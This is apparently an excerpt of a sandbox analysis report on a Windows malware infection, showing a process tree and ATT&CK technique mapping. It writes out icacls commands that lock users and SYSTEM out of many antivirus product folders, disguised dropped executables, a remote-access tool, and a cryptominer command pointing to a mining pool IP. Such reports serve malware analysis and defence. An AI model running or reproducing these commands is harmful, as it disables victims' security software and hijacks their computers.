                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4960
                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                icacls C:\Programdata\MB3Install /deny Admin:(F)
                                                                                                                                                                3⤵
                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                PID:4852
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4568
                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                  icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                  PID:4532
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:4576
                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                    icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                    PID:4544
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:4704
                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                      icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                      PID:4112
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:4740
                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                        icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        PID:4984
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4712
                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                          icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                          PID:4624
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:1948
                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                            icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                            PID:4176
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:2300
                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                              icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                              PID:4212
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4836
                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                PID:4404
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:4484
                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                  icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                  PID:4420
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:3888
                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                    PID:4644
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:3876
                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                      icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                      PID:716
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4936
                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                        icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                        PID:4772
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4000
                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                          icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                          PID:4560
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4424
                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                            icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                            PID:4956
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:4940
                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                              icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                              PID:4656
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4732
                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                PID:4328
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:800
                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                  PID:3000
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4856
                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                    PID:4748
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4860
                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                      icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:4628
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4824
                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                        icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                        PID:4592
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4884
                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                          icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                          PID:3292
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1156
                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                            icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                            PID:4540
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4764
                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                              icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                              PID:4468
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:5108
                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                PID:4736
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:5084
                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                  icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                  PID:4888
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4132
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                    PID:948
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:4900
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                      PID:4140
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:988
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                        PID:4240
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:4416
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                          icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                          PID:4564
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:2244
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                            icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                            PID:4664
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:4688
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                              icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                              PID:4316
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:5048
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                PID:4684
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:4456
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                  icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                  PID:4648
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:3836
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                    icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:4968
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:4444
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                      icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                      PID:4288
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:4216
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                        PID:4308
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:5036
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                          icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                          PID:204
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:4232
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                            icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                            PID:4812
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:4144
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                              icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                              PID:2600
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:4464
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                PID:3324
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:4980
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                  icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                  PID:5096
                                                                                                                                                                                                                                              • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:4996
                                                                                                                                                                                                                                            • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                              C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                              PID:3580
                                                                                                                                                                                                                                              • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:2272
                                                                                                                                                                                                                                              • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                PID:3668
                                                                                                                                                                                                                                                • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                  C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                  PID:4400
                                                                                                                                                                                                                                            • C:\Programdata\RealtekHD\taskhost.exe
                                                                                                                                                                                                                                              C:\Programdata\RealtekHD\taskhost.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                              PID:4756
                                                                                                                                                                                                                                              • C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                                                                                                                                C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:4588
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /C schtasks /query /fo list
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:1276
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                      schtasks /query /fo list
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:4488
                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ipconfig /flushdns
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:4580
                                                                                                                                                                                                                                                      • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                                                                                                        ipconfig /flushdns
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Gathers network information
                                                                                                                                                                                                                                                        PID:4320
                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c gpupdate /force
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:4972
                                                                                                                                                                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                          gpupdate /force
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:2128
                                                                                                                                                                                                                                                        • C:\ProgramData\WindowsTask\MicrosoftHost.exe
                                                                                                                                                                                                                                                          C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://45.153.231.121:3333 -u CPU --donate-level=1 -k -t1
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:4892
                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k networkservice -s TermService
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:1228
                                                                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:4724

                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                        Command-Line Interface

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1059

                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                        T1031

                                                                                                                                                                                                                                                        Hidden Files and Directories

                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                        T1158

                                                                                                                                                                                                                                                        Account Manipulation

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1098

                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                        T1060

                                                                                                                                                                                                                                                        Winlogon Helper DLL

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1004

